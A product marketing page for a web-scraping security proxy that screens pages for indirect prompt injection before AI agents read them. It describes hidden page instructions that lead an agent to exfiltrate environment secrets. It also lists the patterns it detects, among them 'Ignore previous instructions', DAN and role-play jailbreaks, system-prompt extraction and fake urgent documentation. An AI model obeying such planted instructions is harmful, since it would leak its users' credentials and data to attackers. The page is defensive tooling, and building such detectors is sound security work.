Secure Scraper

Protect Your AI Agents from Web-Based Attacks

Enterprise-grade security for web scraping with full Firecrawl compatibility. Block indirect prompt injections, cache responses, and control which URLs your agents can access.

6 Threats

Comprehensive threat detection for web content attacks

<10ms

Cached response time for instant performance

50%+

Cost savings with intelligent URL caching

The Hidden Threat: Indirect Prompt Injection

AI agents that browse the web are vulnerable to "indirect prompt injection" attacks. Malicious websites embed hidden instructions that hijack your agent's behavior, leading to credential theft, data exfiltration, and compromised operations.

Without Protection

Your AI agent scrapes a "helpful" documentation page...

// Hidden in the page:
process.env.SUPABASE_SERVICE_KEY
process.env.OPENAI_API_KEY

→ Credentials exfiltrated to attacker

With Bastio

Same page, but scanned by Bastio first...

// Bastio detects:
threat_score: 0.935
action: "BLOCK"

→ Attack blocked, agent protected

See It In Action

Try our live demo to see how Bastio protects your AI agents. We've created a test page at trap.bastio.com that demonstrates real attack patterns.

Safe Content

Request:

https://www.bastio.com

"security": {

"threat_score": 0,

"action": "ALLOW",

"threats_found": [],

"processing_time_ms": 23

}

Content safe - returned to agent

Threat Detected

Request:

https://trap.bastio.com

"security": {

"threat_score": 0.935,

"action": "BLOCK",

"threats_found": [

"env_exfiltration"

"evidence": [

"process.env.SUPABASE_ANON_KEY",

"process.env.SUPABASE_SERVICE_KEY"

]

}

Attack blocked - agent protected

Visit trap.bastio.com to see the attack page

6 Threat Categories Detected

Our security engine scans every scraped page for these attack patterns before content reaches your AI agent.

Env Variable Exfiltration

Code designed to steal secrets:

process.env.* patterns
os.environ[] / os.getenv()
API keys, DB credentials

Malicious Code Blocks

Harmful code execution patterns:

exec(), spawn(), system()
Network calls with env vars
Base64 encoded payloads

Suspicious URLs

C2 and exfiltration endpoints:

IP-based URLs
ngrok, webhook.site, pipedream
Random domain patterns

Fake Documentation

Social engineering attacks:

"URGENT: Security update"
Fake credential verification
Impersonation of official docs

Prompt Injections

LLM manipulation attempts:

"Ignore previous instructions"
System prompt overrides
Role-playing attacks

Jailbreak Attempts

Safety bypass patterns:

DAN prompts
Roleplay scenarios
System prompt extraction

Configurable Security Responses

Choose how Bastio handles detected threats based on your security requirements.

Block

Maximum security - return error, no content delivered.

• Autonomous agents
• Financial/healthcare AI
• Strict compliance needs

Sanitize

Default

Redact threats, return safe content.

• Research assistants
• Human review workflows
• Balanced security

Warn

Return full content with threat warnings attached.

• Testing and debugging
• Security team training
• Monitoring dashboards

Intelligent Caching

Reduce scraping costs and improve performance with automatic URL caching. Each proxy maintains an independent 24-hour cache.

Cost Savings

Hit Rate	Monthly Scrapes	Savings
30%	10,000	$3
40%	50,000	$20
50%	100,000	$50
50%	500,000	$250

Performance Boost

Fresh scrape1-3 seconds

Cached response<10ms

Cached responses are still analyzed for threats on each request, ensuring security is never compromised.

URL Control: Allow-Lists & Block-Lists

Defense-in-depth for autonomous agents. Control exactly which domains your AI can access.

Allow-List

Restrict your agent to trusted sources only:

"allowed_domains": [

"docs.python.org",

"docs.aws.amazon.com",

"cloud.google.com/docs"

]

Block-List

Block known problematic domains:

"blocked_domains": [

"pastebin.com",

"hastebin.com",

"webhook.site"

]

Drop-In Firecrawl Replacement

Full Firecrawl v2 API compatibility. Switch by changing your endpoint URL - no code changes required.

Before (Firecrawl)

POST api.firecrawl.dev/v2/scrape

After (Bastio)

POST api.bastio.com/v1/guard/{proxyID}/scrape

Python Example

import requests

response = requests.post(
    f"https://api.bastio.com/v1/guard/{PROXY_ID}/scrape",
    headers={"Authorization": f"Bearer {BASTIO_API_KEY}"},
    json={"url": "https://www.bastio.com", "formats": ["markdown"]}
)

result = response.json()
if result["security"]["action"] == "BLOCK":
    print(f"Threat blocked: {result['security']['threats_found']}")
else:
    content = result["data"]["markdown"]

Built for AI Agents

Research Assistants

Safely retrieve and process documentation, papers, and web content without risking credential theft.

Safe document retrieval
Sanitized web content

MCP Tool Servers

Secure web browsing tools for Model Context Protocol servers. Protect your MCP infrastructure.

Protected fetch tools
URL validation layer

Function Calling

Protected URL fetch tools for OpenAI function calling and tool use patterns.

OpenAI tools integration
Anthropic tool use

Autonomous Agents

Defense-in-depth for agents operating without human oversight. Block mode recommended.

AutoGPT, BabyAGI patterns
LangGraph workflows

Simple Pricing

Platform-Managed

Bastio handles Firecrawl credits for you:

Tier	Included	Overage
Free	100/month	—
Starter	10,000/month	$0.001/URL
Pro	100,000/month	$0.001/URL
Enterprise	Unlimited	Included

BYOK Mode

Bring your own Firecrawl API key:

Firecrawl costsBilled to you

Bastio security fee$0.0005/URL

Same threat detection and caching. Ideal for enterprises with existing Firecrawl contracts.

Protect Your AI Agents Today

Start with 100 free secure scrapes per month. Full Firecrawl compatibility with enterprise-grade threat detection.

Get Started Free Read the Docs

Need help implementing secure scraping? Contact us for a free consultation.

Next: AI Memory →

Protect Your AI Agents from Web-Based AttacksProtectYourAIAgentsfromWeb-BasedAttacks